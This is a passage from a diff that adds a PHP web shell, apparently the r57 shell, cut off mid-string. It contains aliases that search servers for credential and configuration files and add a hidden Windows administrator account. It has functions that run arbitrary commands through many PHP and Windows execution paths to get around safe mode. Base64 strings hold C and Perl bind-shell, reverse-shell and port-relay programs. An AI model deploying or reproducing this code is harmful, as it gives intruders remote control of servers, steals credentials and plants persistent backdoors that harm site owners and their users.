connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', + + +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'----------------------------------locate'=>'', +'find httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate proftpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate psybnc.conf'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate my.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate admin.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate cfg.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate conf.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.dat files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.inc files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.inc.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.default.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .pwd files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .sql files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .htpasswd files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .bash_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .mysql_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate backup files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate dump files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate priv files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'________________find orders ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'cat /var/cpanel/accounting.log'=>'cat /var/cpanel/accounting.log', +'find all site of server and user'=>'ls -la /etc/valiases', +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'________________var orders var______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ error_log files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ access.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ error.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ "*.log" files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'________________for server windows ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'1_learn the management server'=>'net user', +'2_add new user'=>'net user egy_spider 123456 /add', +'3_add your user for admin group (this order after add order 1&2'=>'net localgroup administrators egy_spider /add', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "
:: "; +$table_up2 = " ::
"; +$table_up3 = ""; +$arrow = " 4"; +$lb = "["; +$rb = "]"; +$font = ""; +$ts = "
"; +$table_end1 = "
"; +$te = "
"; +$fs = ""; +$fe = ""; + + +if(isset($_GET['users'])) + { + if(!$users=get_users('/etc/passwd')) { echo "
".$lang[$language.'_text96']."
"; } + else + { + echo '
'; + foreach($users as $user) { echo $user."
"; } + echo '
'; + } + echo "
[ BACK ]
"; die(); + } + + +if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; } +if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];} +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = @php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $unix = 0; } + else { $unix = 1; } + } + } + + +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= ""; + foreach($res as $file=>$v) + { + $r .= ""; + $r .= ""; + foreach($v as $a=>$b) + { + $r .= ""; + $r .= ""; + $r .= ""; + $r .= "\n"; + } + } + $r .= "
".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= ""; + $r .= "
".$a."".ws(2).$b."
"; + echo $r; + } + else + { + echo "

".$lang[$language.'_text56']."

"; + } + echo "
[ BACK ]
"; + die(); + } + + +/*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/ +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;} +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } + + +function ws($i) +{ +return @str_repeat(" ",$i); +} + + +function ex($cfe) +{global $unix,$tempdir; + $res = ''; + if (!empty($cfe)) + { + if(@function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(@function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(@function_exists('system')) + { + @ob_start(); + @system('$cfe'); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + if(@function_exists('fread') && @function_exists('feof')){ + while(!@feof($f)) { $res .= @fread($f,1024); } + }else if(@function_exists('fgets') && @function_exists('feof')){ + while(!@feof($f)) { $res .= @fgets($f,1024); } + } + @pclose($f); + } + elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) + { + $res = ""; + if(@function_exists('fread') && @function_exists('feof')){ + while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} + }else if(@function_exists('fgets') && @function_exists('feof')){ + while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} + } + @proc_close($f); + } + }else{$res = safe_ex($cfe);} + return htmlspecialchars($res); +} + + + + +function safe_ex($cfe) +{global $unix,$tempdir; + $res = ''; + if (!empty($cfe)) + { + if(extension_loaded('perl')){ + @ob_start(); + $safeperl=new perl(); + $safeperl->eval("system('$cfe')"); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(!$unix && extension_loaded('ffi')) + { + $output=$tempdir.uniqid('NJ'); + $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); + if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >\"$output\"",0);} + else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >\"$output\"",0);} + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix && extension_loaded('win32service')) + { + $output=$tempdir.uniqid('NJ'); + $n_ser=uniqid('NJ'); + if(!@function_exists('escapeshellarg')) + {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c $cfe >\"$output\""));} + else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c ".@escapeshellarg($cfe)." >\"$output\""));} + @win32_start_service($n_ser); + @win32_stop_service($n_ser); + @win32_delete_service($n_ser); + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix && extension_loaded("win32std")) + { + $output=$tempdir.uniqid('NJ'); + if(!@function_exists('escapeshellarg')){@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');} + else{@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix) + { + $output=$tempdir.uniqid('NJ'); + $suntzu = new COM("WScript.Shell"); + if(!@function_exists('escapeshellarg')){$suntzu->Run('c:\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');} + else{$suntzu->Run('c:\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} + $res=moreread($output); + @unlink($output); + } + elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) + { + $res = '[~] Blind Command Execution via [pcntl_exec]\n\n'; + $output=$tempdir.uniqid('pcntl'); + $pid = @pcntl_fork(); + if ($pid == -1) { + $res .= '[-] Could not children fork. Exit'; + } else if ($pid) { + if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} + else {$res .= '[-] Error. Command incorrect.';} + } else { + $cfe = array(" -e 'system(\"$cfe > $output\")'"); + if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0); + if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0); + die(); + } + $res=moreread($output); + @unlink($output); + } +/* elseif(1) + { + + } +*/ + } + return htmlspecialchars($res); +} + + +function get_users($filename) +{ + $users = $rows = array(); + $rows=@explode("\n",moreread($filename)); + if(!$rows[0]){$rows=@explode("\n",readzlib($filename));} + if(!$rows[0]) return 0; + foreach ($rows as $string) + { + $user = @explode(":",trim($string)); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '
'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '
'; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = ""; +} +function which($pr) +{ +$path = ''; +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return false; } +} +function ps($pr) +{global $unix; +$path = ''; +if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");} +else{$path = ex("tasklist | findstr \"$pr\"");} +if(!empty($path)) { return $path; } else { return false; } +} +function locate($pr) +{ +$path = ''; +$path = ex("locate $pr"); +if(!empty($path)) { return $path; } else { return false; } +} +function cf($fname,$text) +{ + if(!morewrite($fname,@base64_decode($text))){err(0);}; +} +function sr($l,$t1,$t2) + { + return "".$t1."".$t2.""; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"\\1",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ 